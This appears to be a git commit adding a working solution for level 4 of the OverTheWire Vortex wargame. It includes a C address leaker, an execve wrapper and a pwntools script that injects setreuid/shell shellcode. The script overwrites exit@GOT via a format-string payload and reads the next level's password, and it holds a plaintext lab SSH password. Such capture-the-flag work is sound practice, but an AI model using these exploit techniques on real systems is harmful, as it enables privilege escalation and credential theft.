Level 4 WIP

mlen · Mar 19, 2015 · 1290797 · 1290797
1 parent 08b02b1
commit 1290797
Show file tree

Hide file tree

Showing 3 changed files with 85 additions and 0 deletions.
diff --git a/leaker.c b/leaker.c
@@ -0,0 +1,6 @@
+#include <stdio.h>
+int main(int argc, char **argv) {
+    if (argc) return 1;
+    printf("%08x", argv[4]);
+    return 0;
+}
diff --git a/level4.c b/level4.c
@@ -0,0 +1,12 @@
+#include <stdlib.h>
+#include <unistd.h>
+
+int main(int argc, char **argv) {
+    if (argc < 4) {
+        exit(1);
+    }
+
+    char *argp[] = { NULL };
+    char *envp[] = { "a", "b", argv[3], argv[2], NULL };
+    execve(argv[1], argp, envp);
+}
diff --git a/level4.py b/level4.py
@@ -0,0 +1,67 @@
+from pwn import *
+from libformatstr import FormatStr
+from pwnlib.util.fiddling import hexdump_iter
+import pwnlib.log
+
+
+context.arch = 'i386'
+context.os = 'linux'
+
+s = ssh(host='vortex.labs.overthewire.org', user='vortex4', password='2YmgK1=jw')
+s.download_file('/vortex/vortex4')
+
+s.upload_file('level4.c', remote='/tmp/level4.c')
+s.gcc('-m32 -o /tmp/level4 /tmp/level4.c')
+
+s.upload_file('leaker.c', remote='/tmp/leaker.c')
+s.gcc('-m32 -o /tmp/leaker /tmp/leaker.c')
+
+shellcode = asm(shellcraft.nop() * 100 + shellcraft.setreuid() + shellcraft.sh())
+
+# leak shellcode address
+with s.run("/tmp/level4 /tmp/leaker '{}' '{}'".format(shellcode, '')) as p:
+    sc = int(p.recv().strip(), base=16) + 20
+
+# dump stack
+# there are four reasonable paddings, later it wraps around
+stackdump = '%x\n' * 0x200
+magic = '41414141'
+offset = None
+padding = None
+for pad in xrange(4):
+    with s.run("/tmp/level4 /vortex/vortex4 '{}' '{}'".format(shellcode + 'x'*pad, 'AAAA' + stackdump)) as p:
+        r = p.recvall().splitlines()
+
+    if magic in r:
+        # +1 was found empirically 
+        offset = r.index(magic) + 1
+        padding = pad
+        break
+
+if offset is None or padding is None:
+    log.error('Unable to find correct offset or padding')
+
+# prepare format string
+f = FormatStr()
+exe = ELF('vortex4')
+exit = exe.got['exit']
+f[exit] = sc
+
+payload = f.payload(offset)
+
+# uncomment to print addresses instead of writing to them
+# payload = re.sub('hn', '8x', payload)
+
+log.info('exit@got: {}'.format(hex(exit)))
+log.info('sc: {}'.format(hex(sc)))
+log.info('Offset: {}'.format(offset))
+log.info('Padding: {}'.format(padding))
+log.info('Payload: {}'.format(repr(payload)))
+
+with s.run("/tmp/level4 /vortex/vortex4 '{}' '{}'".format(shellcode + 'x'*padding, payload)) as p:
+    # for l in hexdump_iter(p.recvall()):
+        # log.info(l)
+
+    p.clean()
+    p.send('cat /etc/vortex_pass/vortex4\n')
+    log.success('Password: {}'.format(p.recv()))